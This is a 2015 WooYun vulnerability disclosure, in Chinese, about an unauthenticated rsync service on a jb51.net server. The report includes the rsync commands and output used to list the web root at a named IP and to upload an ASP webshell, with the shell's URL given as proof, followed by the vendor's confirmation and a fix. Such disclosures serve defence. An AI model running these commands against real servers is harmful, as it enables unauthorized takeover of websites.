当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-091528

漏洞标题:脚本之家服务运维不当导致主站可getshell

相关厂商:脚本之家

漏洞作者: boooooom

提交时间:2015-01-13 10:06

修复时间:2015-02-27 10:08

公开时间:2015-02-27 10:08

漏洞类型:系统/服务运维配置不当

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-01-13: 细节已通知厂商并且等待厂商处理中
2015-01-14: 厂商已经确认,细节仅向厂商公开
2015-01-24: 细节向核心白帽子及相关领域专家公开
2015-02-03: 细节向普通白帽子公开
2015-02-13: 细节向实习白帽子公开
2015-02-27: 细节向公众公开

简要描述:

RT

详细说明:

rsync 直接操作上传webshell,这应该是其中一个服务器,后端多台,所以我绑host了

[root@localhost ~]# rsync 58.218.204.252::
wwwjb51
imgjb51
[root@localhost ~]# rsync 58.218.204.252::wwwjb51
drwxr-xr-x 0 2015/01/12 23:26:02 .
-rw-r--r-- 5 2014/05/21 22:53:06 1.htm
-rw-r--r-- 258 2010/04/28 23:13:17 1.txt
-rw-r--r-- 26994 2013/06/15 14:24:55 11.htm
-rw-r--r-- 20150 2012/03/23 22:23:30 13568.htm
-rw-r--r-- 8 2010/10/14 16:09:17 225c53b3014826a3.txt
-rw-r--r-- 17069 2012/07/18 15:53:32 29333.htm
-rw-r--r-- 19033 2012/07/20 22:32:46 29963.htm
-rw-r--r-- 36 2010/08/20 22:38:26 360buy-union.txt
-rw-r--r-- 3508 2014/04/02 01:18:45 404.htm
-rw-r--r-- 6343 2009/07/15 19:36:25 404_2.htm
-rw-r--r-- 2032 2009/07/15 19:36:24 404_20091110.htm
-rw-r--r-- 2461 2009/07/15 19:36:25 404_bk.htm
-rw-r--r-- 1551 2009/10/07 13:09:58 404_down.htm
-rw-r--r-- 2479 2009/11/11 02:35:45 404_google.htm
-rw-r--r-- 2394 2009/07/15 19:36:25 404_tan.htm
-rw-r--r-- 85 2013/12/30 17:28:44 BingSiteAuth.xml
-rw-r--r-- 406 2013/08/21 16:13:23 JB51.htm
-rw-r--r-- 10305 2007/08/02 09:04:42 JMailSend.asp
-rw-r--r-- 69 2010/05/31 16:24:10 K6PjAkTpLuqrGLIrXD7QhVCDcTg.txt
-rw-r--r-- 415 2007/08/13 17:25:50 Web.Config
-rw-r--r-- 36 2013/06/17 15:33:27 YEYOU_2a68e7436570ea3c949159ff564bdf59.txt
-rw-r--r-- 6092 2014/06/23 01:15:59 about.htm
-rw-r--r-- 4322 2007/07/14 18:06:59 ajax.js.txt

漏洞证明:

http://www.jb51.net/wy123.asp

[root@localhost ~]# rsync -avz wy123.asp 58.218.204.252::wwwjb51/
sending incremental file list
wy123.asp
sent 96 bytes received 27 bytes 82.00 bytes/sec
total size is 26 speedup is 0.21


shell.jpg


修复方案:

访问控制

版权声明:转载请注明来源 boooooom@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-01-14 22:24

厂商回复:

感谢提醒,没想到还有人能想到这个方法突破,怪我们技术没有考虑rsync的问题

最新状态:

暂无


漏洞评价:

评论

  1. 2015-01-13 10:43 | X防部 ( 普通白帽子 | Rank:487 漏洞数:137 )

    点草脚本之家

  2. 2015-01-14 23:32 | 黑侠 ( 路人 | Rank:1 漏洞数:1 | 帮助别人,等于帮助自己)

    @X防部 点草脚本之家 这个站的站长很牛的呀,网站流量混得好多IP哦,而且站长还接服务器维护,混得不错

  3. 2015-03-01 17:48 | zhxs ( 实习白帽子 | Rank:32 漏洞数:19 | Jyhack-TeaM:http://bbs.jyhack.com/)

    这么叼 麻麻知道嘛